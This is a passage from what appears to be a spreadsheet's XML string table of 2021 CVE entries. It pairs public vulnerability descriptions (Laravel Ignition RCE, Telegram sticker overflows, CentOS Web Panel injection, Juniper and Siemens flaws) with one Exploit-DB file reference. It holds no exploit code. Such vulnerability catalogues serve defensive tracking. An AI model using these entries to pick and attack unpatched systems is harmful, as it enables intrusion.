    <t>CVE-2021-3128</t>
  </si>
  <si>
    <t>In ASUS RT-AX3000, ZenWiFi AX (XT8), RT-AX88U, and other ASUS routers with firmware &lt; 3.0.0.4.386.42095 or &lt; 9.0.0.4.386.41994, when IPv6 is used, a routing loop can occur that generates excessive network traffic between an affected device and its upstream ISP's router. This occurs when a link prefix route points to a point-to-point link, a destination IPv6 address belongs to the prefix and is not a local IPv6 address, and a router advertisement is received with at least one global unique IPv6 prefix for which the on-link flag is set.</t>
  </si>
  <si>
    <t>CVE-2021-3129</t>
  </si>
  <si>
    <t>Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49424.py</t>
  </si>
  <si>
    <t>Laravel 8.4.2 debug mode - Remote code execution</t>
  </si>
  <si>
    <t>CVE-2021-31292</t>
  </si>
  <si>
    <t>An integer overflow in CrwMap::encode0x1810 of Exiv2 0.27.3 allows attackers to trigger a heap-based buffer overflow and cause a denial of service (DOS) via crafted metadata.</t>
  </si>
  <si>
    <t>CVE-2021-3130</t>
  </si>
  <si>
    <t>Within the Open-AudIT up to version 3.5.3 application, the web interface hides SSH secrets, Windows passwords, and SNMP strings from users using HTML 'password field' obfuscation. By using Developer tools or similar, it is possible to change the obfuscation so that the credentials are visible.</t>
  </si>
  <si>
    <t>CVE-2021-3131</t>
  </si>
  <si>
    <t>The Web server in 1C:Enterprise 8 before 8.3.17.1851 sends base64 encoded credentials in the creds URL parameter.</t>
  </si>
  <si>
    <t>CVE-2021-31315</t>
  </si>
  <si>
    <t>Telegram Android &lt;7.1.0 (2090), Telegram iOS &lt;7.1, and Telegram macOS &lt;7.1 are affected by a Stack Based Overflow in the blit function of their custom fork of the rlottie library. A remote attacker might be able to access Telegram's stack memory out-of-bounds on a victim device via a malicious animated sticker.</t>
  </si>
  <si>
    <t>CVE-2021-31316</t>
  </si>
  <si>
    <t>The unprivileged user portal part of CentOS Web Panel is affected by a SQL Injection via the 'idsession' HTTP POST parameter.</t>
  </si>
  <si>
    <t>CVE-2021-31317</t>
  </si>
  <si>
    <t>Telegram Android &lt;7.1.0 (2090), Telegram iOS &lt;7.1, and Telegram macOS &lt;7.1 are affected by a Type Confusion in the VDasher constructor of their custom fork of the rlottie library. A remote attacker might be able to access Telegram's heap memory out-of-bounds on a victim device via a malicious animated sticker.</t>
  </si>
  <si>
    <t>CVE-2021-31318</t>
  </si>
  <si>
    <t>Telegram Android &lt;7.1.0 (2090), Telegram iOS &lt;7.1, and Telegram macOS &lt;7.1 are affected by a Type Confusion in the LOTCompLayerItem::LOTCompLayerItem function of their custom fork of the rlottie library. A remote attacker might be able to access heap memory out-of-bounds on a victim device via a malicious animated sticker.</t>
  </si>
  <si>
    <t>CVE-2021-31319</t>
  </si>
  <si>
    <t>Telegram Android &lt;7.1.0 (2090), Telegram iOS &lt;7.1, and Telegram macOS &lt;7.1 are affected by an Integer Overflow in the LOTGradient::populate function of their custom fork of the rlottie library. A remote attacker might be able to access heap memory out-of-bounds on a victim device via a malicious animated sticker.</t>
  </si>
  <si>
    <t>CVE-2021-31320</t>
  </si>
  <si>
    <t>Telegram Android &lt;7.1.0 (2090), Telegram iOS &lt;7.1, and Telegram macOS &lt;7.1 are affected by a Heap Buffer Overflow in the VGradientCache::generateGradientColorTable function of their custom fork of the rlottie library. A remote attacker might be able to overwrite heap memory out-of-bounds on a victim device via a malicious animated sticker.</t>
  </si>
  <si>
    <t>CVE-2021-31321</t>
  </si>
  <si>
    <t>Telegram Android &lt;7.1.0 (2090), Telegram iOS &lt;7.1, and Telegram macOS &lt;7.1 are affected by a Stack Based Overflow in the gray_split_cubic function of their custom fork of the rlottie library. A remote attacker might be able to overwrite Telegram's stack memory out-of-bounds on a victim device via a malicious animated sticker.</t>
  </si>
  <si>
    <t>CVE-2021-31322</t>
  </si>
  <si>
    <t>Telegram Android &lt;7.1.0 (2090), Telegram iOS &lt;7.1, and Telegram macOS &lt;7.1 are affected by a Heap Buffer Overflow in the LOTGradient::populate function of their custom fork of the rlottie library. A remote attacker might be able to access heap memory out-of-bounds on a victim device via a malicious animated sticker.</t>
  </si>
  <si>
    <t>CVE-2021-31323</t>
  </si>
  <si>
    <t>Telegram Android &lt;7.1.0 (2090), Telegram iOS &lt;7.1, and Telegram macOS &lt;7.1 are affected by a Heap Buffer Overflow in the LottieParserImpl::parseDashProperty function of their custom fork of the rlottie library. A remote attacker might be able to access heap memory out-of-bounds on a victim device via a malicious animated sticker.</t>
  </si>
  <si>
    <t>CVE-2021-31324</t>
  </si>
  <si>
    <t>The unprivileged user portal part of CentOS Web Panel is affected by a Command Injection vulnerability leading to root Remote Code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-31326</t>
  </si>
  <si>
    <t>D-Link DIR-816 A2 1.10 B05 allows unauthenticated attackers to arbitrarily reset the device via a crafted tokenid parameter to /goform/form2Reboot.cgi.</t>
  </si>
  <si>
    <t>CVE-2021-31327</t>
  </si>
  <si>
    <t>Stored XSS in Remote Clinic v2.0 in /medicines due to Medicine Name Field.</t>
  </si>
  <si>
    <t>CVE-2021-31329</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Remote Clinic v2.0 via the "Chat" and "Personal Address" field on staff/register.php</t>
  </si>
  <si>
    <t>CVE-2021-3133</t>
  </si>
  <si>
    <t>The Elementor Contact Form DB plugin before 1.6 for WordPress allows CSRF via backend admin pages.</t>
  </si>
  <si>
    <t>CVE-2021-31330</t>
  </si>
  <si>
    <t>A Cross-Site Scripting (XSS) vulnerability exists within Review Board versions 3.0.20 and 4.0 RC1 and earlier. An authenticated attacker may inject malicious Javascript code when using Markdown editing within the application which remains persistent.</t>
  </si>
  <si>
    <t>CVE-2021-31337</t>
  </si>
  <si>
    <t>The Telnet service of the SIMATIC HMI Comfort Panels system component in affected products does not require authentication, which may allow a remote attacker to gain access to the device if the service is enabled. Telnet is disabled by default on the SINAMICS Medium Voltage Products (SINAMICS SL150: All versions, SINAMICS SM150: All versions, SINAMICS SM150i: All versions).</t>
  </si>
  <si>
    <t>CVE-2021-31338</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINEMA Remote Connect Client (All versions &lt; V3.0 SP1). Affected devices allow to modify configuration settings over an unauthenticated channel. This could allow a local attacker to escalate privileges and execute own code on the device.</t>
  </si>
  <si>
    <t>CVE-2021-31339</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Mendix Excel Importer Module (All versions &lt; V9.0.3). Uploading a manipulated XML File results in an exception that could expose information about the Application-Server and the used XML-Framework.</t>
  </si>
  <si>
    <t>CVE-2021-3134</t>
  </si>
  <si>
    <t>Mubu 2.2.1 allows local users to gain privileges to execute commands, aka CNVD-2020-68878.</t>
  </si>
  <si>
    <t>CVE-2021-31340</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC RF166C (All versions &gt; V1.1 and &lt; V1.3.2), SIMATIC RF185C (All versions &gt; V1.1 and &lt; V1.3.2), SIMATIC RF186C (All versions &gt; V1.1 and &lt; V1.3.2), SIMATIC RF186CI (All versions &gt; V1.1 and &lt; V1.3.2), SIMATIC RF188C (All versions &gt; V1.1 and &lt; V1.3.2), SIMATIC RF188CI (All versions &gt; V1.1 and &lt; V1.3.2), SIMATIC RF360R (All versions &lt; V2.0), SIMATIC Reader RF610R CMIIT (All versions &gt; V3.0 &lt; V4.0), SIMATIC Reader RF610R ETSI (All versions &gt; V3.0 &lt; V4.0), SIMATIC Reader RF610R FCC (All versions &gt; V3.0 &lt; V4.0), SIMATIC Reader RF615R CMIIT (All versions &gt; V3.0 &lt; V4.0), SIMATIC Reader RF615R ETSI (All versions &gt; V3.0 &lt; V4.0), SIMATIC Reader RF615R FCC (All versions &gt; V3.0 &lt; V4.0), SIMATIC Reader RF650R ARIB (All versions &gt; V3.0 &lt; V4.0), SIMATIC Reader RF650R CMIIT (All versions &gt; V3.0 &lt; V4.0), SIMATIC Reader RF650R ETSI (All versions &gt; V3.0 &lt; V4.0), SIMATIC Reader RF650R FCC (All versions &gt; V3.0 &lt; V4.0), SIMATIC Reader RF680R ARIB (All versions &gt; V3.0 &lt; V4.0), SIMATIC Reader RF680R CMIIT (All versions &gt; V3.0 &lt; V4.0), SIMATIC Reader RF680R ETSI (All versions &gt; V3.0 &lt; V4.0), SIMATIC Reader RF680R FCC (All versions &gt; V3.0 &lt; V4.0), SIMATIC Reader RF685R ARIB (All versions &gt; V3.0 &lt; V4.0), SIMATIC Reader RF685R CMIIT (All versions &gt; V3.0 &lt; V4.0), SIMATIC Reader RF685R ETSI (All versions &gt; V3.0 &lt; V4.0), SIMATIC Reader RF685R FCC (All versions &gt; V3.0 &lt; V4.0). Affected devices do not properly handle large numbers of incoming connections. An attacker may leverage this to cause a Denial-of-Service situation.</t>
  </si>
  <si>
    <t>CVE-2021-31341</t>
  </si>
  <si>
    <t>Uploading a table mapping using a manipulated XML file results in an exception that could expose information about the application-server and the used XML-framework on the Mendix Database Replication Module (All versions prior to v7.0.1).</t>
  </si>
  <si>
    <t>CVE-2021-31342</t>
  </si>
  <si>
    <t>The ugeom2d.dll library in all versions of Solid Edge SE2020 before 2020MP14 and all versions of Solid Edge SE2021 before SE2021MP5 lack proper validation of user-supplied data when parsing DFT files. This could result in an out-of-bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-31343</t>
  </si>
  <si>
    <t>The jutil.dll library in all versions of Solid Edge SE2020 before 2020MP14 and all versions of Solid Edge SE2021 before SE2021MP5 lack proper validation of user-supplied data when parsing DFT files. This could result in an out-of-bounds write past the end of an allocation structure. An attacker could leverage this vulnerability to execute code in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-31344</t>
  </si>
  <si>
    <t>A vulnerability has been identified in APOGEE MBC (PPC) (BACnet) (All versions), APOGEE MBC (PPC) (P2 Ethernet) (All versions), APOGEE MEC (PPC) (BACnet) (All versions), APOGEE MEC (PPC) (P2 Ethernet) (All versions), APOGEE PXC Compact (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Compact (P2 Ethernet) (All versions &lt; V2.8.19), APOGEE PXC Modular (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Modular (P2 Ethernet) (All versions &lt; V2.8.19), Capital VSTAR (All versions with enabled Ethernet options), Desigo PXC00-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC00-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC001-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC100-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC12-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC128-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC200-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC36.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC50-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC64-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXM20-E (All versions &gt;= V2.3 and &lt; V6.30.016), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions &lt; V2017.02.4), Nucleus ReadyStart V4 (All versions &lt; V4.1.1), Nucleus Source Code (All versions), PLUSCONTROL 1st Gen (All versions), SIMOTICS CONNECT 400 (All versions &lt; V0.5.0.0), TALON TC Compact (BACnet) (All versions &lt; V3.5.4), TALON TC Modular (BACnet) (All versions &lt; V3.5.4). ICMP echo packets with fake IP options allow sending ICMP echo reply messages to arbitrary hosts on the network. (FSMD-2021-0004)</t>
  </si>
  <si>
    <t>CVE-2021-31345</t>
  </si>
  <si>
    <t>A vulnerability has been identified in APOGEE MBC (PPC) (BACnet) (All versions), APOGEE MBC (PPC) (P2 Ethernet) (All versions), APOGEE MEC (PPC) (BACnet) (All versions), APOGEE MEC (PPC) (P2 Ethernet) (All versions), APOGEE PXC Compact (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Compact (P2 Ethernet) (All versions &lt; V2.8.19), APOGEE PXC Modular (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Modular (P2 Ethernet) (All versions &lt; V2.8.19), Capital VSTAR (All versions with enabled Ethernet options), Desigo PXC00-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC00-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC001-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC100-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC12-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC128-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC200-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC36.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC50-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC64-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXM20-E (All versions &gt;= V2.3 and &lt; V6.30.016), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions &lt; V2017.02.4), Nucleus Source Code (All versions), PLUSCONTROL 1st Gen (All versions), TALON TC Compact (BACnet) (All versions &lt; V3.5.4), TALON TC Modular (BACnet) (All versions &lt; V3.5.4). The total length of an UDP payload (set in the IP header) is unchecked. This may lead to various side effects, including Information Leak and Denial-of-Service conditions, depending on a user-defined applications that runs on top of the UDP protocol. (FSMD-2021-0006)</t>
  </si>
  <si>
    <t>1284</t>
  </si>
  <si>
    <t>CVE-2021-31346</t>
  </si>
  <si>
    <t>A vulnerability has been identified in APOGEE MBC (PPC) (BACnet) (All versions), APOGEE MBC (PPC) (P2 Ethernet) (All versions), APOGEE MEC (PPC) (BACnet) (All versions), APOGEE MEC (PPC) (P2 Ethernet) (All versions), APOGEE PXC Compact (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Compact (P2 Ethernet) (All versions &lt; V2.8.19), APOGEE PXC Modular (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Modular (P2 Ethernet) (All versions &lt; V2.8.19), Capital VSTAR (All versions with enabled Ethernet options), Desigo PXC00-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC00-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC001-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC100-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC12-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC128-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC200-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC36.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC50-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC64-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXM20-E (All versions &gt;= V2.3 and &lt; V6.30.016), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions &lt; V2017.02.4), Nucleus ReadyStart V4 (All versions &lt; V4.1.1), Nucleus Source Code (All versions), PLUSCONTROL 1st Gen (All versions), SIMOTICS CONNECT 400 (All versions &lt; V0.5.0.0), TALON TC Compact (BACnet) (All versions &lt; V3.5.4), TALON TC Modular (BACnet) (All versions &lt; V3.5.4). The total length of an ICMP payload (set in the IP header) is unchecked. This may lead to various side effects, including Information Leak and Denial-of-Service conditions, depending on the network buffer organization in memory. (FSMD-2021-0007)</t>
  </si>
  <si>
    <t>CVE-2021-31347</t>
  </si>
  <si>
    <t>An issue was discovered in libezxml.a in ezXML 0.8.6. The function ezxml_parse_str() performs incorrect memory handling while parsing crafted XML files (writing outside a memory region created by mmap).</t>
  </si>
  <si>
    <t>CVE-2021-31348</t>
  </si>
  <si>
    <t>An issue was discovered in libezxml.a in ezXML 0.8.6. The function ezxml_parse_str() performs incorrect memory handling while parsing crafted XML files (out-of-bounds read after a certain strcspn failure).</t>
  </si>
  <si>
    <t>CVE-2021-31349</t>
  </si>
  <si>
    <t>The usage of an internal HTTP header created an authentication bypass vulnerability (CWE-287), allowing an attacker to view internal files, change settings, manipulate services and execute arbitrary code. This issue affects all Juniper Networks 128 Technology Session Smart Router versions prior to 4.5.11, and all versions of 5.0 up to and including 5.0.1.</t>
  </si>
  <si>
    <t>CVE-2021-3135</t>
  </si>
  <si>
    <t>An issue was discovered in the tagDiv Newspaper theme 10.3.9.1 for WordPress. It allows XSS via the wp-admin/admin-ajax.php td_block_id parameter in a td_ajax_block API call.</t>
  </si>
  <si>
    <t>CVE-2021-31350</t>
  </si>
  <si>
    <t>An Improper Privilege Management vulnerability in the gRPC framework, used by the Juniper Extension Toolkit (JET) API on Juniper Networks Junos OS and Junos OS Evolved, allows a network-based, low-privileged authenticated attacker to perform operations as root, leading to complete compromise of the targeted system. The issue is caused by the JET service daemon (jsd) process authenticating the user, then passing configuration operations directly to the management daemon (mgd) process, which runs as root. This issue affects Juniper Networks Junos OS: 18.4 versions prior to 18.4R1-S8, 18.4R2-S8, 18.4R3-S8; 19.1 versions prior to 19.1R2-S3, 19.1R3-S5; 19.2 versions prior to 19.2R1-S7, 19.2R3-S2; 19.3 versions prior to 19.3R2-S6, 19.3R3-S2; 19.4 versions prior to 19.4R1-S4, 19.4R2-S4, 19.4R3-S3; 20.1 versions prior to 20.1R2-S2, 20.1R3; 20.2 versions prior to 20.2R2-S3, 20.2R3; 20.3 versions prior to 20.3R2-S1, 20.3R3; 20.4 versions prior to 20.4R2. This issue does not affect Juniper Networks Junos OS versions prior to 18.4R1. Juniper Networks Junos OS Evolved: All versions prior to 20.4R2-EVO; 21.1-EVO versions prior to 21.1R2-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-31351</t>
  </si>
  <si>
    <t>An Improper Check for Unusual or Exceptional Conditions in packet processing on the MS-MPC/MS-MIC utilized by Juniper Networks Junos OS allows a malicious attacker to send a specific packet, triggering the MS-MPC/MS-MIC to reset, causing a Denial of Service (DoS). Continued receipt and processing of this packet will create a sustained Denial of Service (DoS) condition. This issue only affects specific versions of Juniper Networks Junos OS on MX Series: 17.3R3-S11; 17.4R2-S13; 17.4R3 prior to 17.4R3-S5; 18.1R3-S12; 18.2R2-S8, 18.2R3-S7, 18.2R3-S8; 18.3R3-S4; 18.4R3-S7; 19.1R3-S4, 19.1R3-S5; 19.2R1-S6; 19.3R3-S2; 19.4R2-S4, 19.4R2-S5; 19.4R3-S2; 20.1R2-S1; 20.2R2-S2, 20.2R2-S3, 20.2R3; 20.3R2, 20.3R2-S1; 20.4R1, 20.4R1-S1, 20.4R2; 21.1R1; This issue does not affect any version of Juniper Networks Junos OS prior to 15.1X49-D240;</t>
  </si>
  <si>
    <t>CVE-2021-31352</t>
  </si>
  <si>
    <t>An Information Exposure vulnerability in Juniper Networks SRC Series devices configured for NETCONF over SSH permits the negotiation of weak ciphers, which could allow a remote attacker to obtain sensitive information. A remote attacker with read and write access to network data could exploit this vulnerability to display plaintext bits from a block of ciphertext and obtain sensitive information. This issue affects all Juniper Networks SRC Series versions prior to 4.13.0-R6.</t>
  </si>
  <si>
    <t>CVE-2021-31353</t>
  </si>
  <si>
    <t>An Improper Handling of Exceptional Conditions vulnerability in Juniper Networks Junos OS and Junos OS Evolved allows an attacker to inject a specific BGP update, causing the routing protocol daemon (RPD) to crash and restart, leading to a Denial of Service (DoS). Continued receipt and processing of the BGP update will create a sustained Denial of Service (DoS) condition. This issue affects very specific versions of Juniper Networks Junos OS: 19.3R3-S2; 19.4R3-S3; 20.2 versions 20.2R2-S3 and later, prior to 20.2R3-S2; 20.3 versions 20.3R2 and later, prior to 20.3R3; 20.4 versions 20.4R2 and later, prior to 20.4R3; 21.1 versions prior to 21.1R2. Juniper Networks Junos OS 20.1 is not affected by this issue. This issue also affects Juniper Networks Junos OS Evolved: All versions prior to 20.4R2-S3-EVO, 20.4R3-EVO; 21.1-EVO versions prior to 21.1R2-EVO; 21.2-EVO versions prior to 21.2R2-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-31354</t>
  </si>
  <si>
    <t>An Out Of Bounds (OOB) access vulnerability in the handling of responses by a Juniper Agile License (JAL) Client in Juniper Networks Junos OS and Junos OS Evolved, configured in Network Mode (to use Juniper Agile License Manager) may allow an attacker to cause a partial Denial of Service (DoS), or lead to remote code execution (RCE). The vulnerability exists in the packet parsing logic on the client that processes the response from the server using a custom protocol. An attacker with control of a JAL License Manager, or with access to the local broadcast domain, may be able to spoof a new JAL License Manager and/or craft a response to the Junos OS License Client, leading to exploitation of this vulnerability. This issue only affects Junos systems configured in Network Mode. Systems that are configured in Standalone Mode (the default mode of operation for all systems) are not vulnerable to this issue. This issue affects: Juniper Networks Junos OS: 19.2 versions prior to 19.2R3-S3; 19.3 versions prior to 19.3R3-S3; 20.1 versions prior to 20.1R2-S2, 20.1R3-S1; 20.2 versions prior to 20.2R3-S2; 20.3 versions prior to 20.3R3; 20.4 versions prior to 20.4R3; 21.1 versions prior to 21.1R2. Juniper Networks Junos OS Evolved: version 20.1R1-EVO and later versions, prior to 21.2R2-EVO. This issue does not affect Juniper Networks Junos OS versions prior to 19.2R1.</t>
  </si>
  <si>
    <t>CVE-2021-31355</t>
  </si>
  <si>
    <t>A persistent cross-site scripting (XSS) vulnerability in the captive portal graphical user interface of Juniper Networks Junos OS may allow a remote authenticated user to inject web script or HTML and steal sensitive data and credentials from a web administration session, possibly tricking a follow-on administrative user to perform administrative actions on the device. This issue affects Juniper Networks Junos OS: All versions, including the following supported releases: 12.3X48 versions prior to 12.3X48-D105; 15.1X49 versions prior to 15.1X49-D220; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R3-S9; 19.1 versions prior to 19.1R3-S7; 19.2 versions prior to 19.2R3-S3; 19.3 versions prior to 19.3R3-S4; 19.4 versions prior to 19.4R3-S6; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R1-S1, 20.2R2; 20.3 versions prior to 20.3R2; 20.4 versions prior to 20.4R2; 21.1 versions prior to 21.1R2.</t>
  </si>
  <si>
    <t>CVE-2021-31356</t>
  </si>
  <si>
    <t>A command injection vulnerability in command processing on Juniper Networks Junos OS Evolved allows an attacker with authenticated CLI access to be able to bypass configured access protections to execute arbitrary shell commands within the context of the current user. The vulnerability allows an attacker to bypass command authorization restrictions assigned to their specific user account and execute commands that are available to the privilege level for which the user is assigned. For example, a user that is in the super-user login class, but restricted to executing specific CLI commands could exploit the vulnerability to execute any other command available to an unrestricted admin user. This vulnerability does not increase the privilege level of the user, but rather bypasses any CLI command restrictions by allowing full access to the shell. This issue affects Juniper Networks Junos OS Evolved: All versions prior to 20.4R3-S1-EVO; All versions of 21.1-EVO and 21.2-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-31357</t>
  </si>
  <si>
    <t>A command injection vulnerability in tcpdump command processing on Juniper Networks Junos OS Evolved allows an attacker with authenticated CLI access to be able to bypass configured access protections to execute arbitrary shell commands within the context of the current user. The vulnerability allows an attacker to bypass command authorization restrictions assigned to their specific user account and execute commands that are available to the privilege level for which the user is assigned. For example, a user that is in the super-user login class, but restricted to executing specific CLI commands could exploit the vulnerability to execute any other command available to an unrestricted admin user. This vulnerability does not increase the privilege level of the user, but rather bypasses any CLI command restrictions by allowing full access to the shell. This issue affects Juniper Networks Junos OS Evolved: All versions prior to 20.3R2-S1-EVO; 20.4 versions prior to 20.4R2-S2-EVO; 21.1 versions prior to 21.1R2-EVO; 21.2 versions prior to 21.2R1-S1-EVO, 21.2R2-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-31358</t>
  </si>
  <si>
    <t>A command injection vulnerability in sftp command processing on Juniper Networks Junos OS Evolved allows an attacker with authenticated CLI access to be able to bypass configured access protections to execute arbitrary shell commands within the context of the current user. The vulnerability allows an attacker to bypass command authorization restrictions assigned to their specific user account and execute commands that are available to the privilege level for which the user is assigned. For example, a user that is in the super-user login class, but restricted to executing specific CLI commands could exploit the vulnerability to execute any other command available to an unrestricted admin user. This vulnerability does not increase the privilege level of the user, but rather bypasses any CLI command restrictions by allowing full access to the shell. This issue affects Juniper Networks Junos OS Evolved: All versions prior to 20.4R2-S2-EVO; 21.1 versions prior to 21.1R2-EVO; 21.2 versions prior to 21.2R1-S1-EVO, 21.2R2-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-31359</t>
  </si>
  <si>
    <t>A local privilege escalation vulnerability in Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged user to cause the Juniper DHCP daemon (jdhcpd) process to crash, resulting in a Denial of Service (DoS), or execute arbitrary commands as root. Continued processing of malicious input will repeatedly crash the system and sustain the Denial of Service (DoS) condition. Systems are only vulnerable if jdhcpd is running, which can be confirmed via the 'show system processes' command. For example: root@host# run show system processes extensive | match dhcp 26537 root -16 0 97568K 13692K RUN 0 0:01 3.71% jdhcpd This issue affects: Juniper Networks Junos OS: All versions, including the following supported releases: 15.1 versions prior to 15.1R7-S10; 17.4 versions prior to 17.4R3-S5; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R3-S9; 19.1 versions prior to 19.1R3-S6; 19.2 versions prior to 19.2R1-S7, 19.2R3-S3; 19.3 versions prior to 19.3R2-S6, 19.3R3-S3; 19.4 versions prior to 19.4R3-S6; 20.1 versions prior to 20.1R2-S2, 20.1R3-S1; 20.2 versions prior to 20.2R3-S2; 20.3 versions prior to 20.3R3; 20.4 versions prior to 20.4R2-S1, 20.4R3; 21.1 versions prior to 21.1R1-S1, 21.1R2. Juniper Networks Junos OS Evolved: All versions prior to 20.4R2-S3-EVO; All versions of 21.1-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-31360</t>
  </si>
  <si>
    <t>An improper privilege management vulnerability in the Juniper Networks Junos OS and Junos OS Evolved command-line interpreter (CLI) allows a low-privileged user to overwrite local files as root, possibly leading to a system integrity issue or Denial of Service (DoS). Depending on the files overwritten, exploitation of this vulnerability could lead to a sustained Denial of Service (DoS) condition, requiring manual user intervention to recover. Systems are only vulnerable if jdhcpd is running, which can be confirmed via the 'show system processes' command. For example: root@host# run show system processes extensive | match dhcp 26537 root -16 0 97568K 13692K RUN 0 0:01 3.71% jdhcpd This issue affects: Juniper Networks Junos OS: All versions, including the following supported releases: 15.1 versions prior to 15.1R7-S10; 17.4 versions prior to 17.4R3-S5; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R3-S9; 19.1 versions prior to 19.1R3-S6; 19.2 versions prior to 19.2R1-S7, 19.2R3-S3; 19.3 versions prior to 19.3R2-S6, 19.3R3-S3; 19.4 versions prior to 19.4R3-S6; 20.1 versions prior to 20.1R2-S2, 20.1R3-S1; 20.2 versions prior to 20.2R3-S2; 20.3 versions prior to 20.3R3; 20.4 versions prior to 20.4R2-S1, 20.4R3; 21.1 versions prior to 21.1R1-S1, 21.1R2. Juniper Networks Junos OS Evolved: All versions prior to 20.4R2-S3-EVO; All versions of 21.1-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-31361</t>
  </si>
  <si>
    <t>An Improper Check for Unusual or Exceptional Conditions vulnerability combined with Improper Handling of Exceptional Conditions in Juniper Networks Junos OS on QFX Series and PTX Series allows an unauthenticated network based attacker to cause increased FPC CPU utilization by sending specific IP packets which are being VXLAN encapsulated leading to a partial Denial of Service (DoS). Continued receipted of these specific traffic will create a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS on QFX Series: All versions prior to 17.3R3-S11; 17.4 versions prior to 17.4R2-S13, 17.4R3-S4; 18.1 versions prior to 18.1R3-S12; 18.2 versions prior to 18.2R2-S8, 18.2R3-S7; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R1-S8, 18.4R2-S7, 18.4R3-S7; 19.1 versions prior to 19.1R1-S6, 19.1R2-S2, 19.1R3-S4; 19.2 versions prior to 19.2R1-S6, 19.2R3-S2; 19.3 versions prior to 19.3R3-S1; 19.4 versions prior to 19.4R2-S3, 19.4R3-S1; 20.1 versions prior to 20.1R2, 20.1R3; 20.2 versions prior to 20.2R2, 20.2R3; 20.3 versions prior to 20.3R1-S1, 20.3R2. Juniper Networks Junos OS on PTX Series: All versions prior to 18.4R3-S9; 19.1 versions prior to 19.1R3-S6; 19.2 versions prior to 19.2R1-S7, 19.2R3-S3; 19.3 versions prior to 19.3R2-S6, 19.3R3-S3; 19.4 versions prior to 19.4R1-S4, 19.4R3-S5; 20.1 versions prior to 20.1R2-S2, 20.1R3; 20.2 versions prior to 20.2R3-S1; 20.3 versions prior to 20.3R2-S1, 20.3R3; 20.4 versions prior to 20.4R2-S1, 20.4R3; 21.1 versions prior to 21.1R1-S1, 21.1R2.</t>
  </si>
  <si>
    <t>CVE-2021-31362</t>
  </si>
  <si>
